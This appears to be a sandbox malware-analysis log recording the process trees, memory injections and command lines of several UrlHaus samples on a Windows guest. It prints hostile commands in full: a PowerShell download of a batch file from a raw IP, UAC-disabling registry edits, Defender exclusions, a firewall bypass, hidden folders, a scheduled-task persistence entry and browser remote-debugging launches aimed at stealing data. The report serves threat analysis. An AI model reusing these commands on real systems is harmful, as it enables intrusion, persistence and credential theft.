PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4276 wrote to memory of 4292 N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
PID 4992 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 4992 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 4992 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
PID 4992 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe
PID 4992 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe
PID 4992 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe
PID 4992 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe
PID 4992 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe
PID 2644 wrote to memory of 3960 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 2644 wrote to memory of 3960 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 2644 wrote to memory of 3960 N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe C:\Users\Admin\AppData\Roaming\svchost.exe
PID 4616 wrote to memory of 1864 N/A C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe C:\Windows\SYSTEM32\cmd.exe
PID 4616 wrote to memory of 1864 N/A C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe C:\Windows\SYSTEM32\cmd.exe
PID 4992 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe
PID 4992 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe
PID 4992 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe
PID 4992 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe
PID 4992 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe
PID 4992 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe
PID 2260 wrote to memory of 892 N/A C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe C:\Windows\SysWOW64\cmd.exe
PID 2260 wrote to memory of 892 N/A C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe C:\Windows\SysWOW64\cmd.exe
PID 2260 wrote to memory of 892 N/A C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe C:\Windows\SysWOW64\cmd.exe
PID 892 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 892 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 892 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 3696 wrote to memory of 3460 N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3696 wrote to memory of 3460 N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3460 wrote to memory of 3748 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3460 wrote to memory of 3748 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

"C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe"

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe

C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"

C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe

"C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\SYSTEM32\cmd.exe

cmd

C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe

"C:\Users\Admin\Downloads\UrlHausFiles\KB824105-x86-ENU.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c net use

C:\Windows\SysWOW64\net.exe

net use

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff846cccc40,0x7ff846cccc4c,0x7ff846cccc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,16951722600455288079,2608899704824720371,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1900 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1944,i,16951722600455288079,2608899704824720371,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1956 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2192,i,16951722600455288079,2608899704824720371,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2408 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3136,i,16951722600455288079,2608899704824720371,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3144,i,16951722600455288079,2608899704824720371,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3224 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4112,i,16951722600455288079,2608899704824720371,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4460 /prefetch:1

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BE10.tmp\BE11.tmp\BE12.bat C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)

C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE" goto :target

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C1D9.tmp\C1DA.tmp\C1DB.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE goto :target"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE

C:\Windows\system32\attrib.exe

attrib +s +h d:\net

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff842e83cb8,0x7ff842e83cc8,0x7ff842e83cd8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1572,5248377632876562868,14919088256453826371,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1868 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1572,5248377632876562868,14919088256453826371,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2348 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1572,5248377632876562868,14919088256453826371,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2712 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1572,5248377632876562868,14919088256453826371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1572,5248377632876562868,14919088256453826371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4780,i,16951722600455288079,2608899704824720371,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,16951722600455288079,2608899704824720371,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4840 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1572,5248377632876562868,14919088256453826371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1572,5248377632876562868,14919088256453826371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\chromedump.exe

"C:\Users\Admin\Downloads\UrlHausFiles\chromedump.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff842e83cb8,0x7ff842e83cc8,0x7ff842e83cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1932 /prefetch:2

C:\Users\Admin\Downloads\UrlHausFiles\unik.exe

"C:\Users\Admin\Downloads\UrlHausFiles\unik.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2720 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4760 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2296 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1928,17338189157652449224,1817144729899058537,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:1

C:\Users\Admin\Downloads\UrlHausFiles\c1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\c1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe"

C:\Users\Admin\Downloads\UrlHausFiles\System.exe

"C:\Users\Admin\Downloads\UrlHausFiles\System.exe"

C:\Users\Admin\AppData\Local\Temp\._cache_System.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_System.exe"

C:\ProgramData\Synaptics\Synaptics.exe

"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate

C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate

C:\Windows\system32\schtasks.exe

SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\Deccastationers.msi"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\._cache_System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'

